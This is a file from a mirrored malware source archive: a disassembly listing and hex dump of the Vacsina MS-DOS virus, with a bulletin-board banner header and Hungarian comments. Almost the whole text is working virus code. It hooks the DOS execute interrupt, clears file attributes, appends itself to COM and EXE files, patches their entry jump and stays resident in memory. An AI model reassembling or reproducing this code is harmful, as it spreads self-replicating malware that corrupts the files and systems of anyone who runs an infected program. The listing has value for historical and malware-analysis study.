Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-01 03:12:31 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vacsv.lst

747 lines
28 KiB
Plaintext
Raw Normal View History

Add files via upload
2021-01-13 00:04:54 +00:00
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
Vacsina VIRUS: `90.04.13.
Comment: K<>v<EFBFBD>ri L<>szl<7A>
(41) 21-033
Unassembled list:
13B0:0100 E96908 JMP 096C
13B0:0103 49 DEC CX
13B0:0104 60 DB 60
13B0:0105 6D DB 6D
13B0:0106 206120 AND [BX+DI+20],AH
13B0:0109 56 PUSH SI
13B0:010A 61 DB 61
13B0:010B 63 DB 63
13B0:010C 7369 JNB 0177
13B0:010E 6E DB 6E
13B0:010F 61 DB 61
13B0:0110 205649 AND [BP+49],DL
13B0:0113 52 PUSH DX
13B0:0114 55 PUSH BP
13B0:0115 53 PUSH BX
13B0:0116 210D AND [DI],CX
13B0:0118 0A24 OR AH,[SI]
13B0:011A 0000 ADD [BX+SI],AL
13B0:05AA 0000 ADD [BX+SI],AL
13B0:05AC B409 MOV AH,09
13B0:05AE BA0301 MOV DX,0103
13B0:05B1 CD21 INT 21
13B0:05B3 B400 MOV AH,00
13B0:05B5 CD20 INT 20
13B0:05B7 005D00 ADD [DI+00],BL
13B0:05BA 5E POP SI
13B0:05BB 00FF ADD BH,BH
13B0:05BD FF6000 JMP [BX+SI+00]
13B0:05C0 4D DEC BP
13B0:05C1 07 POP ES
13B0:05C2 004B00 ADD [BP+DI+00],CL
13B0:05C5 0000 ADD [BX+SI],AL
13B0:05CD 0000 ADD [BX+SI],AL
13B0:05CF 00720E ADD [BP+SI+0E],DH
13B0:05D2 AE SCASB
13B0:05D3 0F POP CS
13B0:05D4 56 PUSH SI
13B0:05D5 05200D ADD AX,0D20
13B0:05D8 2000 AND [BX+SI],AL
13B0:05DA 050003 ADD AX,0300
13B0:05DD 01CD ADD BP,CX
13B0:05DF 21B400CD AND [SI+CD00],SI
13B0:05E3 2000 AND [BX+SI],AL
13B0:05E5 56 PUSH SI
13B0:05E6 41 INC CX
13B0:05E7 43 INC BX
13B0:05E8 53 PUSH BX
13B0:05E9 49 DEC CX
13B0:05EA 4E DEC SI
13B0:05EB 41 INC CX
13B0:05EC 2020 AND [BX+SI],AH
13B0:05EE 2020 AND [BX+SI],AH
13B0:05F0 0000 ADD [BX+SI],AL
13B0:05F2 800000 ADD BYTE PTR [BX+SI],00
13B0:05F5 0000 ADD [BX+SI],AL
13B0:05F7 007C11 ADD [SI+11],BH
13B0:05FA 37 AAA
13B0:05FB A800 TEST AL,00
13B0:05FD 40 INC AX
13B0:05FE C20046 RET 4600
13B0:0601 0A00 OR AL,[BX+SI]
13B0:0603 0000 ADD [BX+SI],AL
13B0:0605 0000 ADD [BX+SI],AL
13B0:0607 0000 ADD [BX+SI],AL
13B0:0609 2020 AND [BX+SI],AH
13B0:060B 2020 AND [BX+SI],AH
13B0:060D 2020 AND [BX+SI],AH
13B0:060F 2020 AND [BX+SI],AH
13B0:0611 2020 AND [BX+SI],AH
13B0:0613 2020 AND [BX+SI],AH
13B0:0615 2020 AND [BX+SI],AH
13B0:0617 2020 AND [BX+SI],AH
13B0:0619 2020 AND [BX+SI],AH
13B0:061B 2020 AND [BX+SI],AH
13B0:061D E80000 CALL 0620
13B0:0620 5B POP BX
13B0:0621 50 PUSH AX
13B0:0622 8CC0 MOV AX,ES
13B0:0624 051000 ADD AX,0010
13B0:0627 8B0E0E01 MOV CX,[010E]
13B0:062B 03C8 ADD CX,AX
13B0:062D 894FFB MOV [BX-05],CX
13B0:0630 8B0E1601 MOV CX,[0116]
13B0:0634 03C8 ADD CX,AX
13B0:0636 894FF7 MOV [BX-09],CX
13B0:0639 8B0E1001 MOV CX,[0110]
13B0:063D 894FF9 MOV [BX-07],CX
13B0:0640 8B0E1401 MOV CX,[0114]
13B0:0644 894FF5 MOV [BX-0B],CX
13B0:0647 8B3E1801 MOV DI,[0118]
13B0:064B 8B160801 MOV DX,[0108]
13B0:064F B104 MOV CL,04
13B0:0651 D3E2 SHL DX,CL
13B0:0653 8B0E0601 MOV CX,[0106]
13B0:0657 E317 JCXZ 0670
13B0:0659 26 ES:
13B0:065A C5B50001 LDS SI,[DI+0100]
13B0:065E 83C704 ADD DI,+04
13B0:0661 8CDD MOV BP,DS
13B0:0663 26 ES:
13B0:0664 032E0801 ADD BP,[0108]
13B0:0668 03E8 ADD BP,AX
13B0:066A 8EDD MOV DS,BP
13B0:066C 0104 ADD [SI],AX
13B0:066E E2E9 LOOP 0659
13B0:0670 0E PUSH CS
13B0:0671 1F POP DS
13B0:0672 BF0001 MOV DI,0100
13B0:0675 8BF2 MOV SI,DX
13B0:0677 81C60001 ADD SI,0100
13B0:067B 8BCB MOV CX,BX
13B0:067D 2BCE SUB CX,SI
13B0:067F F3 REPZ
13B0:0680 A4 MOVSB
13B0:0681 58 POP AX
13B0:0682 FA CLI
13B0:0683 8E57FB MOV SS,[BX-05]
13B0:0686 8B67F9 MOV SP,[BX-07]
13B0:0689 FB STI
13B0:068A FF6FF5 JMP FAR [BX-0B]
13B0:068D B003 MOV AL,03
13B0:068F CF IRET
;INT 21h rutin
13B0:0690 9C PUSHF
13B0:0691 3D004B CMP AX,4B00 ;program ind<6E>t<EFBFBD>s ?
13B0:0694 7406 JZ 069C ;igen
13B0:0696 9D POPF
13B0:0697 2E CS:
13B0:0698 FF2E0000 JMP FAR [0000] ;INT 21h kezdet<65>re
13B0:069C 06 PUSH ES
13B0:069D 1E PUSH DS
13B0:069E 55 PUSH BP
13B0:069F 57 PUSH DI
13B0:06A0 56 PUSH SI
13B0:06A1 52 PUSH DX
13B0:06A2 51 PUSH CX
13B0:06A3 53 PUSH BX
13B0:06A4 50 PUSH AX
13B0:06A5 8BEC MOV BP,SP
13B0:06A7 B82435 MOV AX,3524
13B0:06AA CD21 INT 21 ;kil<69>p<EFBFBD>s kritikus hiba eset<65>n
;rutin c<>m<EFBFBD>nek lek<65>rdez<65>se
13B0:06AC 2E CS:
13B0:06AD 8C060600 MOV [0006],ES ;let<65>rol<6F>sa seg.
13B0:06B1 2E CS:
13B0:06B2 891E0400 MOV [0004],BX ;offs
13B0:06B6 0E PUSH CS
13B0:06B7 1F POP DS
13B0:06B8 BABD00 MOV DX,00BD
13B0:06BB B82425 MOV AX,2524
13B0:06BE CD21 INT 21 ;INT 24h <20>t<EFBFBD>ll<6C>t<EFBFBD>sa
13B0:06C0 0E PUSH CS
13B0:06C1 1F POP DS
13B0:06C2 BA1400 MOV DX,0014
13B0:06C5 B40F MOV AH,0F
13B0:06C7 CD21 INT 21 ;FCB-s file nyit<69>s
13B0:06C9 B80043 MOV AX,4300
13B0:06CC 8E5E0E MOV DS,[BP+0E]
13B0:06CF 8B5606 MOV DX,[BP+06]
13B0:06D2 CD21 INT 21 ;file attrib lek<65>rd.
13B0:06D4 7303 JNB 06D9
13B0:06D6 E9DA01 JMP 08B3
13B0:06D9 2E CS:
13B0:06DA 890E0800 MOV [0008],CX
13B0:06DE B80143 MOV AX,4301
13B0:06E1 80E1FE AND CL,FE
13B0:06E4 CD21 INT 21 ;file attrib be<62>ll<6C>t<EFBFBD>s
13B0:06E6 7303 JNB 06EB
13B0:06E8 E9C801 JMP 08B3
13B0:06EB B8023D MOV AX,3D02
13B0:06EE 8E5E0E MOV DS,[BP+0E]
13B0:06F1 8B5606 MOV DX,[BP+06]
13B0:06F4 CD21 INT 21 ;file nyit<69>s r/w
13B0:06F6 7303 JNB 06FB
13B0:06F8 E9A801 JMP 08A3
13B0:06FB 2E CS:
13B0:06FC A30A00 MOV [000A],AX
13B0:06FF 8BD8 MOV BX,AX
13B0:0701 0E PUSH CS
13B0:0702 1F POP DS
13B0:0703 BA0C00 MOV DX,000C
13B0:0706 B90600 MOV CX,0006
13B0:0709 B43F MOV AH,3F
13B0:070B CD21 INT 21 ;els<6C> 6 byte olvas<61>sa
13B0:070D 7219 JB 0728
13B0:070F 3D0600 CMP AX,0006
13B0:0712 7514 JNZ 0728 ;bej<65>tt mind ?
13B0:0714 2E CS:
13B0:0715 813E0C004D5A CMP WORD PTR [000C],5A4D ;EXE file ?
13B0:071B 7503 JNZ 0720 ;nem
13B0:071D E9B501 JMP 08D5
13B0:0720 2E CS:
13B0:0721 803E0C00E9 CMP BYTE PTR [000C],E9 ;COM file ?
13B0:0726 7403 JZ 072B ;igen
13B0:0728 E96F01 JMP 089A
;Teend<6E>k COM file eset<65>n
13B0:072B B80242 MOV AX,4202
13B0:072E B90000 MOV CX,0000
13B0:0731 8BD1 MOV DX,CX
13B0:0733 2E CS:
13B0:0734 8B1E0A00 MOV BX,[000A]
13B0:0738 CD21 INT 21 ;file m<>ret lek<65>rdez<65>se
13B0:073A 72EC JB 0728
13B0:073C 83FA00 CMP DX,+00 ;65535 n<>l nagyobb ?
13B0:073F 75E7 JNZ 0728 ;igen
13B0:0741 3DB604 CMP AX,04B6 ;1026 n<>l kisebb ?
13B0:0744 76E2 JBE 0728 ;igen
13B0:0746 3D93F5 CMP AX,F593 ;62867-n<>l nagyobb ?
13B0:0749 73DD JNB 0728 ;igen
13B0:074B 2E CS:
13B0:074C A39E04 MOV [049E],AX ;m<>ret megjegyz<79>se
13B0:074F 2E CS:
13B0:0750 A10D00 MOV AX,[000D]
13B0:0753 050301 ADD AX,0103
13B0:0756 2E CS:
13B0:0757 A3A004 MOV [04A0],AX
13B0:075A B80242 MOV AX,4202
13B0:075D B9FFFF MOV CX,FFFF
13B0:0760 BAF8FF MOV DX,FFF8
13B0:0763 2E CS:
13B0:0764 8B1E0A00 MOV BX,[000A]
13B0:0768 CD21 INT 21 ;file m<>ret<65>nek megn<67>vel<65>se
13B0:076A 72BC JB 0728
13B0:076C 2E CS:
13B0:076D 8B1E0A00 MOV BX,[000A]
13B0:0771 0E PUSH CS
13B0:0772 1F POP DS
13B0:0773 BA0C00 MOV DX,000C
13B0:0776 B90800 MOV CX,0008
13B0:0779 B43F MOV AH,3F
13B0:077B CD21 INT 21 ;8 byte be
13B0:077D 72A9 JB 0728
13B0:077F 3D0800 CMP AX,0008 ;bej<65>tt mind ?
13B0:0782 75A4 JNZ 0728 ;nem
13B0:0784 2E CS:
13B0:0785 813E1000F47A CMP WORD PTR [0010],7AF4 ;?
13B0:078B 7577 JNZ 0804
13B0:078D 2E CS:
13B0:078E 833E120005 CMP WORD PTR [0012],+05 ;?
13B0:0793 90 NOP
13B0:0794 7392 JNB 0728
13B0:0796 2E CS:
13B0:0797 A10C00 MOV AX,[000C] ;els<6C> beolvasott sz<73>
13B0:079A 2E CS:
13B0:079B A39E04 MOV [049E],AX
13B0:079E 2E CS:
13B0:079F A10E00 MOV AX,[000E]
13B0:07A2 2E CS:
13B0:07A3 A3A004 MOV [04A0],AX
13B0:07A6 2D0301 SUB AX,0103
13B0:07A9 2E CS:
13B0:07AA A30C00 MOV [000C],AX
13B0:07AD B80042 MOV AX,4200
13B0:07B0 B90000 MOV CX,0000
13B0:07B3 BA0100 MOV DX,0001
13B0:07B6 2E CS:
13B0:07B7 8B1E0A00 MOV BX,[000A]
13B0:07BB CD21 INT 21 ;pozicion<6F>l<EFBFBD>s a file 2. bytej<65>ra
13B0:07BD 725F JB 081E
13B0:07BF B440 MOV AH,40
13B0:07C1 0E PUSH CS
13B0:07C2 1F POP DS
13B0:07C3 BA0C00 MOV DX,000C
13B0:07C6 B90200 MOV CX,0002
13B0:07C9 CD21 INT 21 ;2 byte ki<6B>r<EFBFBD>sa
13B0:07CB 7251 JB 081E
13B0:07CD 3D0200 CMP AX,0002 ;ki<6B>rta mind ?
13B0:07D0 754C JNZ 081E ;nem
13B0:07D2 2E CS:
13B0:07D3 8B1E0A00 MOV BX,[000A]
13B0:07D7 B445 MOV AH,45
13B0:07D9 CD21 INT 21 ;file handle kett<74>z<EFBFBD>se
13B0:07DB 7208 JB 07E5
13B0:07DD 8BD8 MOV BX,AX
13B0:07DF B43E MOV AH,3E
13B0:07E1 CD21 INT 21 ;file z<>r<EFBFBD>sa
13B0:07E3 7239 JB 081E
13B0:07E5 B80042 MOV AX,4200
13B0:07E8 B90000 MOV CX,0000
13B0:07EB 2E CS:
13B0:07EC 8B169E04 MOV DX,[049E]
13B0:07F0 2E CS:
13B0:07F1 8B1E0A00 MOV BX,[000A]
13B0:07F5 CD21 INT 21 ;elej<65>re pozicion<6F>l<EFBFBD>s
13B0:07F7 7225 JB 081E
13B0:07F9 B440 MOV AH,40
13B0:07FB 0E PUSH CS
13B0:07FC 1F POP DS
13B0:07FD B90000 MOV CX,0000
13B0:0800 CD21 INT 21 ;file m<>ret be<62>ll<6C>t<EFBFBD>sa
13B0:0802 721A JB 081E
13B0:0804 B80042 MOV AX,4200
13B0:0807 B90000 MOV CX,0000
13B0:080A 2E CS:
13B0:080B 8B169E04 MOV DX,[049E]
13B0:080F 83C20F ADD DX,+0F
13B0:0812 83E2F0 AND DX,-10
13B0:0815 2E CS:
13B0:0816 8B1E0A00 MOV BX,[000A]
13B0:081A CD21 INT 21 ;file pointer mozgat<61>sa
13B0:081C 7303 JNB 0821
13B0:081E EB7A JMP 089A
13B0:0820 90 NOP
13B0:0821 2E CS:
13B0:0822 8B1E0A00 MOV BX,[000A]
13B0:0826 8CCA MOV DX,CS
13B0:0828 4A DEC DX
13B0:0829 8EDA MOV DS,DX
13B0:082B BA0000 MOV DX,0000
13B0:082E B9B604 MOV CX,04B6
13B0:0831 B440 MOV AH,40
13B0:0833 CD21 INT 21 ;<3B>nmag<61>nak kim<69>sol<6F>sa
13B0:0835 72E7 JB 081E
13B0:0837 3DB604 CMP AX,04B6 ;siker<65>lt ?
13B0:083A 75E2 JNZ 081E ;nem
13B0:083C 2E CS:
13B0:083D 8B1E0A00 MOV BX,[000A]
13B0:0841 B445 MOV AH,45
13B0:0843 CD21 INT 21 ;file handle kett<74>z<EFBFBD>se
13B0:0845 7208 JB 084F
13B0:0847 8BD8 MOV BX,AX
13B0:0849 B43E MOV AH,3E
13B0:084B CD21 INT 21 ;file z<>r<EFBFBD>sa
13B0:084D 72CF JB 081E
13B0:084F 2E CS:
13B0:0850 C6060C00E9 MOV BYTE PTR [000C],E9 ;COM ?
13B0:0855 2E CS:
13B0:0856 8B169E04 MOV DX,[049E]
13B0:085A 83C20F ADD DX,+0F
13B0:085D 83E2F0 AND DX,-10
13B0:0860 83EA03 SUB DX,+03
13B0:0863 81C2AC03 ADD DX,03AC
13B0:0867 2E CS:
13B0:0868 89160D00 MOV [000D],DX
13B0:086C B80042 MOV AX,4200
13B0:086F B90000 MOV CX,0000
13B0:0872 8BD1 MOV DX,CX
13B0:0874 2E CS:
13B0:0875 8B1E0A00 MOV BX,[000A]
13B0:0879 CD21 INT 21 ;pozicion<6F>l<EFBFBD>s az elej<65>re
13B0:087B 72A1 JB 081E
13B0:087D 2E CS:
13B0:087E 8B1E0A00 MOV BX,[000A]
13B0:0882 0E PUSH CS
13B0:0883 1F POP DS
13B0:0884 BA0C00 MOV DX,000C
13B0:0887 B90300 MOV CX,0003
13B0:088A B440 MOV AH,40
13B0:088C CD21 INT 21 ;3 byte JMP ki<6B>r<EFBFBD>sa
13B0:088E 728E JB 081E
13B0:0890 3D0300 CMP AX,0003 ;siker<65>lt ?
13B0:0893 7589 JNZ 081E ;nem
13B0:0895 B8070E MOV AX,0E07
13B0:0898 CD10 INT 10 ;beep jelz<6C>s hogy fert<72>z<EFBFBD>tt
13B0:089A B43E MOV AH,3E
13B0:089C 2E CS:
13B0:089D 8B1E0A00 MOV BX,[000A]
13B0:08A1 CD21 INT 21 ;file z<>r<EFBFBD>sa
13B0:08A3 B80143 MOV AX,4301
13B0:08A6 8E5E0E MOV DS,[BP+0E]
13B0:08A9 8B5606 MOV DX,[BP+06]
13B0:08AC 2E CS:
13B0:08AD 8B0E0800 MOV CX,[0008]
13B0:08B1 CD21 INT 21 ;eredeti attrib vissza<7A>ll<6C>t<EFBFBD>sa
13B0:08B3 0E PUSH CS
13B0:08B4 1F POP DS
13B0:08B5 BA1400 MOV DX,0014
13B0:08B8 B410 MOV AH,10
13B0:08BA CD21 INT 21 ;FCB-s file z<>r<EFBFBD>sa
13B0:08BC B82425 MOV AX,2524
13B0:08BF 2E CS:
13B0:08C0 C5160400 LDS DX,[0004]
13B0:08C4 CD21 INT 21 ;INT 24 az eredetire
13B0:08C6 58 POP AX
13B0:08C7 5B POP BX
13B0:08C8 59 POP CX
13B0:08C9 5A POP DX
13B0:08CA 5E POP SI
13B0:08CB 5F POP DI
13B0:08CC 5D POP BP
13B0:08CD 1F POP DS
13B0:08CE 07 POP ES
13B0:08CF 9D POPF
13B0:08D0 2E CS:
13B0:08D1 FF2E0000 JMP FAR [0000]
;Teend<6E>k EXE file eset<65>n
13B0:08D5 B80242 MOV AX,4202
13B0:08D8 B90000 MOV CX,0000
13B0:08DB 8BD1 MOV DX,CX
13B0:08DD 2E CS:
13B0:08DE 8B1E0A00 MOV BX,[000A]
13B0:08E2 CD21 INT 21 ;file v<>g<EFBFBD>re poz.
13B0:08E4 72B4 JB 089A
13B0:08E6 83FA00 CMP DX,+00 ;nagyobb 65535-n<>l
13B0:08E9 75AF JNZ 089A ;igen
13B0:08EB 3DB3FD CMP AX,FDB3 ;nagyobb ?
13B0:08EE 73AA JNB 089A ;igen
13B0:08F0 2E CS:
13B0:08F1 A39E04 MOV [049E],AX ;m<>ret t<>rol<6F>sa
13B0:08F4 2E CS:
13B0:08F5 A11000 MOV AX,[0010]
13B0:08F8 48 DEC AX
13B0:08F9 B109 MOV CL,09
13B0:08FB D3E0 SHL AX,CL
13B0:08FD 2E CS:
13B0:08FE 03060E00 ADD AX,[000E]
13B0:0902 2E CS:
13B0:0903 3B069E04 CMP AX,[049E]
13B0:0907 7591 JNZ 089A
13B0:0909 2E CS:
13B0:090A 8B1E0A00 MOV BX,[000A]
13B0:090E B440 MOV AH,40
13B0:0910 0E PUSH CS
13B0:0911 1F POP DS
13B0:0912 BA3900 MOV DX,0039
13B0:0915 B98400 MOV CX,0084
13B0:0918 CD21 INT 21 ;132 byte ki<6B>r<EFBFBD>sa
13B0:091A 72C8 JB 08E4
13B0:091C 3D8400 CMP AX,0084 ;siker<65>lt ?
13B0:091F 75E6 JNZ 0907 ;nem
13B0:0921 2E CS:
13B0:0922 8B1E0A00 MOV BX,[000A]
13B0:0926 B445 MOV AH,45
13B0:0928 CD21 INT 21 ;file handle megkett<74>z<EFBFBD>se
13B0:092A 7208 JB 0934
13B0:092C 8BD8 MOV BX,AX
13B0:092E B43E MOV AH,3E
13B0:0930 CD21 INT 21 ;file z<>r<EFBFBD>sa
13B0:0932 72B0 JB 08E4
13B0:0934 B80042 MOV AX,4200
13B0:0937 B90000 MOV CX,0000
13B0:093A 8BD1 MOV DX,CX
13B0:093C 2E CS:
13B0:093D 8B1E0A00 MOV BX,[000A]
13B0:0941 CD21 INT 21 ;file elej<65>re poz.
13B0:0943 729F JB 08E4
13B0:0945 2E CS:
13B0:0946 C6060C00E9 MOV BYTE PTR [000C],E9 ;COM ?
13B0:094B 2E CS:
13B0:094C A19E04 MOV AX,[049E]
13B0:094F 051100 ADD AX,0011
13B0:0952 2E CS:
13B0:0953 A30D00 MOV [000D],AX
13B0:0956 2E CS:
13B0:0957 8B1E0A00 MOV BX,[000A]
13B0:095B B440 MOV AH,40
13B0:095D 0E PUSH CS
13B0:095E 1F POP DS
13B0:095F BA0C00 MOV DX,000C
13B0:0962 B90300 MOV CX,0003
13B0:0965 CD21 INT 21 ;3 byte ki<6B>r<EFBFBD>sa
13B0:0967 E930FF JMP 089A ;ugr<67>s a file z<>r<EFBFBD>sra
13B0:096A 0000 ADD [BX+SI],AL
13B0:096C E80000 CALL 096F ;Bel<65>p<EFBFBD>si pont
13B0:096F 5B POP BX ;IP BX -be
13B0:0970 2E CS:
13B0:0971 8947FB MOV [BX-05],AX
13B0:0974 B80000 MOV AX,0000
13B0:0977 8EC0 MOV ES,AX
13B0:0979 26 ES:
13B0:097A A1C500 MOV AX,[00C5]
13B0:097D 3D7F39 CMP AX,397F
13B0:0980 7508 JNZ 098A
13B0:0982 26 ES:
13B0:0983 A0C700 MOV AL,[00C7]
13B0:0986 3C05 CMP AL,05
13B0:0988 7332 JNB 09BC
13B0:098A 8BD4 MOV DX,SP
13B0:098C 2BD3 SUB DX,BX
13B0:098E 81EA6C0B SUB DX,0B6C
13B0:0992 7228 JB 09BC
13B0:0994 BAC504 MOV DX,04C5
13B0:0997 B104 MOV CL,04
13B0:0999 D3EA SHR DX,CL
13B0:099B 2E CS:
13B0:099C 899754FC MOV [BX+FC54],DX
13B0:09A0 8CD9 MOV CX,DS
13B0:09A2 03D1 ADD DX,CX
13B0:09A4 8EC2 MOV ES,DX
13B0:09A6 8BF3 MOV SI,BX
13B0:09A8 81C651FC ADD SI,FC51
13B0:09AC 8BFE MOV DI,SI
13B0:09AE B9B604 MOV CX,04B6
13B0:09B1 FC CLD
13B0:09B2 F3 REPZ
13B0:09B3 A4 MOVSB
13B0:09B4 06 PUSH ES
13B0:09B5 E80300 CALL 09BB
13B0:09B8 EB13 JMP 09CD
13B0:09BA 90 NOP
13B0:09BB CB RETF
13B0:09BC 8CC8 MOV AX,CS
13B0:09BE 8ED8 MOV DS,AX
13B0:09C0 8EC0 MOV ES,AX
13B0:09C2 8ED0 MOV SS,AX
13B0:09C4 2E CS:
13B0:09C5 8B47FB MOV AX,[BX-05]
13B0:09C8 2E CS:
13B0:09C9 FFA70101 JMP [BX+0101]
13B0:09CD BE0000 MOV SI,0000
13B0:09D0 BF0000 MOV DI,0000
13B0:09D3 8BCB MOV CX,BX
13B0:09D5 81C161FC ADD CX,FC61
13B0:09D9 8CC2 MOV DX,ES
13B0:09DB 4A DEC DX
13B0:09DC 8EC2 MOV ES,DX
13B0:09DE 8CDA MOV DX,DS
13B0:09E0 4A DEC DX
13B0:09E1 8EDA MOV DS,DX
13B0:09E3 03F1 ADD SI,CX ;CX=48f0
13B0:09E5 4E DEC SI
13B0:09E6 8BFE MOV DI,SI
13B0:09E8 FD STD
13B0:09E9 F3 REPZ
13B0:09EA A4 MOVSB
13B0:09EB FC CLD
13B0:09EC 2E CS:
13B0:09ED 8B9754FC MOV DX,[BX+FC54]
13B0:09F1 26 ES:
13B0:09F2 29160300 SUB [0003],DX
13B0:09F6 26 ES:
13B0:09F7 8C0E0100 MOV [0001],CS
13B0:09FB BF0000 MOV DI,0000
13B0:09FE 8BF3 MOV SI,BX
13B0:0A00 81C651FC ADD SI,FC51
13B0:0A04 B9B604 MOV CX,04B6 ;byte-ok sz<73>ma
13B0:0A07 1E PUSH DS
13B0:0A08 07 POP ES ;ES=DS
13B0:0A09 0E PUSH CS
13B0:0A0A 1F POP DS ;DS=CS
13B0:0A0B F3 REPZ
13B0:0A0C A4 MOVSB ;<3B>nmag<61>nak <20>tpakol<6F>sa
13B0:0A0D 26 ES:
13B0:0A0E 832E030001 SUB WORD PTR [0003],+01
13B0:0A13 53 PUSH BX
13B0:0A14 8CCB MOV BX,CS
13B0:0A16 B450 MOV AH,50
13B0:0A18 CD21 INT 21 ;? rezidens m<>r ?
13B0:0A1A 5B POP BX
13B0:0A1B 2E CS:
13B0:0A1C 8C0E3600 MOV [0036],CS
13B0:0A20 2E CS:
13B0:0A21 8B162C00 MOV DX,[002C] ;k<>rnyezet c<>me
13B0:0A25 4A DEC DX
13B0:0A26 8EC2 MOV ES,DX
13B0:0A28 26 ES:
13B0:0A29 8C0E0100 MOV [0001],CS
13B0:0A2D B82135 MOV AX,3521
13B0:0A30 53 PUSH BX
13B0:0A31 CD21 INT 21 ;INT 21h c<>m lek<65>rdez<65>se
13B0:0A33 36 SS:
13B0:0A34 8C060200 MOV [0002],ES
13B0:0A38 36 SS:
13B0:0A39 891E0000 MOV [0000],BX
13B0:0A3D 5B POP BX
13B0:0A3E B82125 MOV AX,2521
13B0:0A41 8CD2 MOV DX,SS
13B0:0A43 8EDA MOV DS,DX
13B0:0A45 BAC000 MOV DX,00C0
13B0:0A48 CD21 INT 21 ;INT 21h <20>tir<69>ny<6E>t<EFBFBD>sa
13B0:0A4A B80000 MOV AX,0000
13B0:0A4D 8EC0 MOV ES,AX
13B0:0A4F 26 ES:
13B0:0A50 C706C5007F39 MOV WORD PTR [00C5],397F ;?
13B0:0A56 26 ES:
13B0:0A57 C606C70005 MOV BYTE PTR [00C7],05 ?
13B0:0A5C 8CC8 MOV AX,CS
13B0:0A5E 8ED8 MOV DS,AX
13B0:0A60 B41A MOV AH,1A
13B0:0A62 BA5000 MOV DX,0050
13B0:0A65 CD21 INT 21 ;DTA. be<62>ll<6C>t<EFBFBD>sa
13B0:0A67 2E CS:
13B0:0A68 8B47FB MOV AX,[BX-05]
13B0:0A6B E94EFF JMP 09BC
13B0:0A6E B704 MOV BH,04
13B0:0A70 AC LODSB
13B0:0A71 05F47A ADD AX,7AF4
13B0:0A74 050000 ADD AX,0000
13B0:0A77 0000 ADD [BX+SI],AL
Dumped list:
13B0:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 E7 0F 2F 03 . ............/.
13B0:0010 E7 0F BC 02 E7 0F AF 0F-01 03 01 00 02 FF FF FF ................
13B0:0020 FF FF FF FF FF FF FF FF-FF FF FF FF A7 13 4C 01 ..............L.
13B0:0030 21 13 14 00 18 00 B0 13-FF FF FF FF 00 00 00 00 !...............
13B0:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
13B0:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
13B0:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
13B0:0080 01 20 0D 61 63 73 76 2E-63 6F 6D 20 0D 63 3A 5C . .acsv.com .c:\
13B0:0090 75 74 69 6C 3B 63 3A 5C-75 74 69 6C 5C 78 79 77 util;c:\util\xyw
13B0:00A0 72 69 74 65 3B 63 3A 5C-6E 79 65 6C 76 65 6B 5C rite;c:\nyelvek\
13B0:00B0 64 62 61 73 65 3B 63 3A-5C 6E 79 65 6C 76 65 6B dbase;c:\nyelvek
13B0:00C0 5C 63 6C 69 70 70 65 72-0D 00 00 00 00 00 00 00 \clipper........
13B0:00D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0100 E9 69 08 49 60 6D 20 61-20 56 61 63 73 69 6E 61 .i.I`m a Vacsina
13B0:0110 20 56 49 52 55 53 21 0D-0A 24 00 00 00 00 00 00 VIRUS!..$......
13B0:0120 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:0590 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
13B0:05A0 00 00 00 00 00 00 00 00-00 00 00 00 B4 09 BA 03 ................
13B0:05B0 01 CD 21 B4 00 CD 20 00-5D 00 5E 00 FF FF 60 00 ..!... .].^...`.
13B0:05C0 4D 07 00 4B 00 00 00 00-00 00 00 00 00 00 00 00 M..K............
13B0:05D0 72 0E AE 0F 56 05 20 0D-20 00 05 00 03 01 CD 21 r...V. . ......!
13B0:05E0 B4 00 CD 20 00 56 41 43-53 49 4E 41 20 20 20 20 ... .VACSINA
13B0:05F0 00 00 80 00 00 00 00 00-7C 11 37 A8 00 40 C2 00 ........|.7..@..
13B0:0600 46 0A 00 00 00 00 00 00-00 20 20 20 20 20 20 20 F........
13B0:0610 20 20 20 20 20 20 20 20-20 20 20 20 20 E8 00 00 ...
13B0:0620 5B 50 8C C0 05 10 00 8B-0E 0E 01 03 C8 89 4F FB [P............O.
13B0:0630 8B 0E 16 01 03 C8 89 4F-F7 8B 0E 10 01 89 4F F9 .......O......O.
13B0:0640 8B 0E 14 01 89 4F F5 8B-3E 18 01 8B 16 08 01 B1 .....O..>.......
13B0:0650 04 D3 E2 8B 0E 06 01 E3-17 26 C5 B5 00 01 83 C7 .........&......
13B0:0660 04 8C DD 26 03 2E 08 01-03 E8 8E DD 01 04 E2 E9 ...&............
13B0:0670 0E 1F BF 00 01 8B F2 81-C6 00 01 8B CB 2B CE F3 .............+..
13B0:0680 A4 58 FA 8E 57 FB 8B 67-F9 FB FF 6F F5 B0 03 CF .X..W..g...o....
13B0:0690 9C 3D 00 4B 74 06 9D 2E-FF 2E 00 00 06 1E 55 57 .=.Kt.........UW
13B0:06A0 56 52 51 53 50 8B EC B8-24 35 CD 21 2E 8C 06 06 VRQSP...$5.!....
